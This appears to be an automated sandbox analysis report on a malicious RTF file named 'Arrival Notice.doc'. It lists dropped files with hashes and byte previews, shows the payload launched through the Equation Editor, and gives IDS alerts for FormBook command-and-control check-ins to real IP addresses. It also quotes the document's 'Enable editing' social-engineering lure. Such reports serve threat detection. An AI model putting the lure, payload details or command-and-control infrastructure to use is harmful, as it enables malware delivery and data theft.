SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Vevine

Download File

Process:	C:\Users\user\AppData\Roaming\fredchungel99962.exe
File Type:	ASCII text, with very long lines (29744), with no line terminators
Category:	dropped
Size (bytes):	29744
Entropy (8bit):	3.552971543005111
Encrypted:	false
SSDEEP:	768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbYE+I563b4vfF3if6gyw:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Rg
MD5:	9E16ADF70A47A6258CD17D7A3579FE29
SHA1:	F8B441137EA7B9F4F4DB5E5C034997C09A0DB123
SHA-256:	6BD81BE7D5180A08D56A295F3147CCAFA799DA193B4C141441D14C621EDA6DF5
SHA-512:	B5B4A07B57E806F3A79D2259ED3BCE4130AD95E52AA4C031084000B810FE72DEA75B96B22B0455F5475E94F268D6BF5616916B32B89FD274314CF44A9DD29CF3
Malicious:	false
Preview:	048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066

C:\Users\user\AppData\Local\Temp\autC37F.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\fredchungel99962.exe
File Type:	data
Category:	dropped
Size (bytes):	274944
Entropy (8bit):	7.993065344113608
Encrypted:	true
SSDEEP:	6144:zCT5lZp6aC4nUGDuLGQJiixsghOo6pa8MYnr0uu1tfm:zujX63GGZpx4o6jpr0uurfm
MD5:	6DE5283E765459444E4E219C56C8D4B5
SHA1:	CCE89AF44771BB9C5D35EC449100F97574AD2304
SHA-256:	21B5884459286DBC5ACDC4BA0F925C1E562F45827CD7E2ECBF446EA9860DC462
SHA-512:	D4F807D10D54002595B311BE2270FA5D921E60DAF9BA48A97C5E96436EC6827B3C8E93C2BEE03AF3A33963233DFE4F47474C12BBB11EF17729708E6D0EBA0958
Malicious:	false
Preview:	t....3ZA0h..E...x.RF..0^..SL3ZA00Z9L6APVDARE34L93V9AYSL3.A00T&.8A._.`.D..mm[?Ja)!#T( ].9X"X.$v&$r7FZlP]v}..s!\>$.=W3h6APVDAR<2=..S1.\|94..:&.*....!7.^....T+.).e3+..(SXgY+.APVDARE3d.93.8@Y..x.A00Z9L6A.VF@YD84L.7V9AYSL3ZA %Z9L&APVtERE3tL9#V9A[SL5ZA00Z9L0APVDARE3.H93T9AYSL3XAp.Z9\6A@VDARU34\93V9AYCL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V.5<+83ZAT.^9L&APVdERE#4L93V9AYSL3ZA0.Z9,6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9

C:\Users\user\AppData\Local\Temp\autC3CE.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\fredchungel99962.exe
File Type:	data
Category:	dropped
Size (bytes):	9946
Entropy (8bit):	7.594733721900883
Encrypted:	false
SSDEEP:	192:m+cKTG02JtOno/1F8+szxWdxvH9WnD2kxosnIKs8vNxMh:97TGRJtOnojddlH902WIGNmh
MD5:	1CF276BC85D72DAC8B6031F50117C544
SHA1:	BE7D769E3DB533DF806322AEED340C696BA14F72
SHA-256:	1ED5C8E85D4587E9B266BBB7E1CFC684200F5A49ADC012410576995F126825EE
SHA-512:	9DD68C481A48E9851D966199226E66288CC5410957B1F339BFBF954411E32FE306C73B74BF5641B24DF7B97A7283FF5AEEF8BB98BFA678350C30CD9C13AAA4F7
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\ophiolatrous

Download File

Process:	C:\Users\user\AppData\Roaming\fredchungel99962.exe
File Type:	data
Category:	dropped
Size (bytes):	274944
Entropy (8bit):	7.993065344113608
Encrypted:	true
SSDEEP:	6144:zCT5lZp6aC4nUGDuLGQJiixsghOo6pa8MYnr0uu1tfm:zujX63GGZpx4o6jpr0uurfm
MD5:	6DE5283E765459444E4E219C56C8D4B5
SHA1:	CCE89AF44771BB9C5D35EC449100F97574AD2304
SHA-256:	21B5884459286DBC5ACDC4BA0F925C1E562F45827CD7E2ECBF446EA9860DC462
SHA-512:	D4F807D10D54002595B311BE2270FA5D921E60DAF9BA48A97C5E96436EC6827B3C8E93C2BEE03AF3A33963233DFE4F47474C12BBB11EF17729708E6D0EBA0958
Malicious:	false
Preview:	t....3ZA0h..E...x.RF..0^..SL3ZA00Z9L6APVDARE34L93V9AYSL3.A00T&.8A._.`.D..mm[?Ja)!#T( ].9X"X.$v&$r7FZlP]v}..s!\>$.=W3h6APVDAR<2=..S1.\|94..:&.*....!7.^....T+.).e3+..(SXgY+.APVDARE3d.93.8@Y..x.A00Z9L6A.VF@YD84L.7V9AYSL3ZA %Z9L&APVtERE3tL9#V9A[SL5ZA00Z9L0APVDARE3.H93T9AYSL3XAp.Z9\6A@VDARU34\93V9AYCL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V.5<+83ZAT.^9L&APVdERE#4L93V9AYSL3ZA0.Z9,6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9AYSL3ZA00Z9L6APVDARE34L93V9

C:\Users\user\AppData\Local\Temp\sqlite3.def

Download File

Process:	C:\Windows\SysWOW64\finger.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	5506
Entropy (8bit):	4.3513336451747735
Encrypted:	false
SSDEEP:	96:GcuN/gR+7Oc0XRMcGM3KOGOF++BwIMtvrENw+Y0aR:E/Q+7Oc0RKOBF+++HvrENw+cR
MD5:	DF728FE35F4E5FE7A1DBFB2BC8C99972
SHA1:	B6CDA0088369B887B479F4B80CDA7426DFDF9010
SHA-256:	82064FB9C414C8A50F090C6E8F9D17269B3F9B1B35E9EFE78C70ADBCB31929FD
SHA-512:	008A9960F5D959632F19766D0A8C1C7C00E3208BB8FAE6AAE822DA8BD3D83F48764FE348D6DAF6F0FCC6F4BDFA8636B0F86FF5165E57B0ECD55174028CE0EEEA
Malicious:	false
Preview:	EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

C:\Users\user\AppData\Local\Temp\sqlite3.dll

Download File

Process:	C:\Windows\SysWOW64\finger.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	870278
Entropy (8bit):	6.5072738600213365
Encrypted:	false
SSDEEP:	24576:sBEJPplYq6r/6hllzJ6Ic01re2g+b60/17:s6JPIiDJJ6Ic0JTgZo
MD5:	87F9E5A6318AC1EC5EE05AA94A919D7A
SHA1:	7A9956E8DE89603DBA99772DA29493D3FD0FE37D
SHA-256:	7705B87603E0D772E1753441001FCF1AC2643EE41BF14A8177DE2C056628665C
SHA-512:	C45C03176142918E34F746711E83384572BD6A8ED0A005600AA4A18CF22EADE06C76EDA190B37DB49EC1971C4649E086AFFD19EEE108C5F405DF27C0C8CB23D2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Invoices.xls, Detection: malicious, Browse Filename: SISF23208BP_1.xls, Detection: malicious, Browse Filename: belge_24.3.2023.xls, Detection: malicious, Browse Filename: ORDERR.xls, Detection: malicious, Browse Filename: purchaseOrder_list_(P.O_R477304).xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[.j.........!.........^.....................a.......................................... ...................... ..N ...P..0...............................x1...........................p.......................Q...............................text...P...........................`.P`.data...............................@.`..rdata..T.... ......................@.`@.bss....(.............................`..edata..N ... ..."..................@.0@.idata..0....P......................@.0..CRT....,....`.......(..............@.0..tls.... ....p.......*..............@.0..rsrc................,..............@.0..reloc..x1.......2...2..............@.0B/4...................d..............@.@B/19.................h..............@..B/31.................................@..B/45.................................@..B/57..................:..............@.0B/70.....i............D..

C:\Users\user\AppData\Local\Temp\xjn0f.zip

Download File

Process:	C:\Windows\SysWOW64\finger.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	454843
Entropy (8bit):	7.998387778913046
Encrypted:	true
SSDEEP:	12288:ilOoZN01vhTrL1i+mlcCM0PVhM+o+iVUe4J:LosvhXBi+mlcCM0t65xaJ
MD5:	D71848944418C67F6EB230682F9A969A
SHA1:	11D37A0ECCBAF9995C6B236FF1A99D174A2566BD
SHA-256:	EFFF0464180FCB34EC33E7835086EA58ADC84BC3F0B08A7323EF1D58B258E59E
SHA-512:	7BAEF376FB5F87E43124F79F81FE45567B7926BE277A05ABBBFE74BDBBE8DC49C238999E432FB4C457DFF23CA78915D2A899BDDE9A2EE79B77C655C17EBE706D
Malicious:	false
Preview:	PK...........L..h. ...........sqlite3.defUT.....[..[ux.........d.....Ks.6....7.;.....I{.MCI..c.T..z...>v....d... ...~..._?.........I.]x...=\|..&h.7......<..-..&.t..".-;..\|.p....V.<..I.N.2sO^..l5aV........A)NNa...l.F..\|<Sj....n..C.-...k.Z......`M.;...8.7...E.....4'...~......w..B..: B/.0..`.z..,..\c'V/..M..@...#I.....R...Xa}. ..U..<..9..~>...W..,.F.4#e......V.`..Beo...G&.-3V.r<...yx\5vE..f.D"l0r.-.L.9..1o..Ra.....?.....8.x...Jor.b4{Z./U....t....x.bY.u[..h.;.W.k...f.....1..\../b.....Y"..B...Y\|..Br.O........V.L...c..y.CM.O..!0........X..h....pUg.bV&.noD.z..............(...b2/..v.+,.........)&.Q.j..g]c........zN....``...%W(4o1......f.............,o=e.x.,..p..u`.d.UV.9.9.W.M.1.c...~./...8.RfiDR.s.N.c.h.E...FQ..t....U.QW...#....d..F.V.-.$.t,r...+......(..a..R...1P....vZ...Z.l. t?._Z8..G..DT.....(.C.."._..$.../..PIz.R..g..al.D...PL<c.....U!....3Vycfr...m^*.Mg.~am[^..3k..fm.a.!3..+\|}...........o8].o.......F.~..).j.....%....}...A1..y.u..Ws........M.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Arrival Notice.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Fri May 3 08:31:56 2024, length=341595, window=hide
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	4.575447354092671
Encrypted:	false
SSDEEP:	12:8tLGe1tgXg/XAlCPCHaXyBkmXB/J89rX+WcD0VlNvG0+icvbOdpeIK06DtZ3Yilv:8tL7/XTCzc9mD6y0deqHg06Dv3q/k7N
MD5:	8891AFC664C72EE8981AA31F13246FA8
SHA1:	EDF3C40BDEA61DDCAD5BAB66E0A72D569EDC13D8
SHA-256:	CBEEFD625DAF265DDC68B22EC3C9BECF9962F0202F4C90EF7F51A2B1C770047B
SHA-512:	1E896821B9E24BAEF03EF05780ED02EEB559C58F05C979241EBEB1911263A5A9D5D24BEE756EF084A67B28E77024A2C5B4E76A0AA333D30D495B20F1FE1E61E8
Malicious:	false
Preview:	L..................F.... .......r.......r.....K.<...[6...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.K..user.8......QK.X.X.K...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.[6...X.K .ARRIVA~1.DOC..R.......WB..WB..........................A.r.r.i.v.a.l. .N.o.t.i.c.e...d.o.c.......\|...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\Arrival Notice.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.r.r.i.v.a.l. .N.o.t.i.c.e...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9.W.e8...8.....[D_

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.472352713920308
Encrypted:	false
SSDEEP:	3:M1xIiRgAlm4pIiRgAlv:Mnhxhf
MD5:	1BBC02A951D7AC2780681A8BD877AD3B
SHA1:	138AB93FFB6E36AB8D368FC6DE1246904D2522CA
SHA-256:	C521D839E3CB3105812C14F9D172843D74AFD59FEEC2D9DE4CE59888656903B2
SHA-512:	DC8C35D21D497F07683305D7586B961DF1600ACABDFC6D62A20D0F1E7149B2940B0D828756F591FADB57D522EB7C5B8090FA1E1E35878D482C83F3A1F4451827
Malicious:	false
Preview:	[doc]..Arrival Notice.LNK=0..[folders]..Arrival Notice.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\fredchungel99962.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228800
Entropy (8bit):	7.11399332916018
Encrypted:	false
SSDEEP:	24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8aUDjzCmdlsy0g2gV:DTvC/MTQYxsWR7aUDqmd47
MD5:	3E42573B12F2ADBEFD9E6540BB9C56FD
SHA1:	FE13DE9D389BBE2C9E42A286D933958180254421
SHA-256:	80D4532A06DAB066B1DAE4346148175A5CE3555B509D795EB40CEB4E03C411D0
SHA-512:	9121BF098EB9AF2BDD377534B8F998AB6ACF0253ED2D2B2D951EFF8AD46A36D09F2C2357656E975615D10392A7EB17C77F4FF7D9CFC37AAFFBC4E5E78DC309F1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...C.3f..........".................w.............@.......................... ............@...@.......@.....................d...\|....@..DT.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...DT...@...V..................@..@.reloc...u.......v...J..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$rival Notice.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	3.495597926728534
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Arrival Notice.doc
File size:	341'595 bytes
MD5:	11f7254f05c7b7f931284c6b90cf2d7c
SHA1:	ecadd711c7fc21009d53958e1d139819f9918f78
SHA256:	59dad890842120178c79a9d3b7947dac9bc9d1f074437fdbca765c1867534166
SHA512:	26ef77b9c571a244bebe4833b74e468005adf923c72ae8ad299136606c057c22d12132cf9e0bace4ae6f62708ecb796f2c65f13a84e208fdf1154005a6ff5516
SSDEEP:	6144:fwAYwAYwAYwAYwAYwAYwAYwAYwAYwAshnZhJ7:pd7
TLSH:	0074BF2DD34B02598F620377AB571E5142BDBA7EF38552B1302C537933EAC39A1252BE
File Content Preview:	{\rtf1..{\*\JGnG6XMftTpicvwGYX3HgwabBFZA8gdDdZ3tyaD9D5EjvyoWBWRAubitGD4WX5Zt6h7LfSpdo7dxnaGIUlG}..{\691071386please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accorda

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00015510h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/24-11:34:28.808194	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49191	80	192.168.2.22	46.28.105.2
05/03/24-11:34:47.919376	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49197	80	192.168.2.22	162.240.81.18
05/03/24-11:35:39.407794	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49209	80	192.168.2.22	208.91.197.27
05/03/24-11:33:20.566188	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49175	80	192.168.2.22	66.96.162.142
05/03/24-11:33:07.336582	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49171	80	192.168.2.22	162.255.119.150
05/03/24-11:33:38.630331	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49179	80	192.168.2.22	192.185.225.30
05/03/24-11:34:07.305361	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49187	80	192.168.2.22	217.26.48.101
05/03/24-11:35:20.478938	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49203	80	192.168.2.22	46.242.239.47
05/03/24-11:33:52.951160	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49183	80	192.168.2.22	203.161.62.199
05/03/24-11:32:31.814899	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49164	80	192.168.2.22	91.195.240.19
05/03/24-11:32:59.169437	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49169	80	192.168.2.22	47.238.226.135
05/03/24-11:33:12.608470	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49173	80	192.168.2.22	162.255.119.150
05/03/24-11:35:54.469895	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49211	80	192.168.2.22	172.67.145.66
05/03/24-11:35:25.894742	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49205	80	192.168.2.22	46.242.239.47
05/03/24-11:33:44.028137	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49181	80	192.168.2.22	192.185.225.30
05/03/24-11:33:30.438067	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49177	80	192.168.2.22	66.96.162.142
05/03/24-11:34:34.210463	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49193	80	192.168.2.22	46.28.105.2
05/03/24-11:35:04.226489	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49199	80	192.168.2.22	91.195.240.94
05/03/24-11:34:42.420484	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49195	80	192.168.2.22	162.240.81.18
05/03/24-11:33:50.047007	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49182	80	192.168.2.22	203.161.62.199
05/03/24-11:35:09.627954	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49201	80	192.168.2.22	91.195.240.94
05/03/24-11:33:58.457671	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49185	80	192.168.2.22	203.161.62.199
05/03/24-11:32:53.522404	TCP	2855464	ETPRO TROJAN FormBook CnC Checkin (POST) M3	49167	80	192.168.2.22	47.238.226.135
05/03/24-11:34:14.888435	TCP	2855465	ETPRO TROJAN FormBook CnC Checkin (GET) M2	49189	80	192.168.2.22	217.26.48.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 11:32:01.206454039 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.206512928 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.206670046 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.214652061 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.214667082 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.404395103 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.404464960 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.409722090 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.409739971 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.410165071 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.410223961 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.658648968 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.700118065 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757796049 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757847071 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757873058 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.757901907 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757915974 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.757930040 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757947922 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.757952929 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757968903 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.757982016 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.757993937 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758004904 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758018017 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758034945 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758065939 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758111954 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758117914 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758162022 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758383989 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758428097 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758433104 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758475065 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758480072 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758528948 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:01.758546114 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:01.758585930 CEST	49163	443	192.168.2.22	172.67.175.222
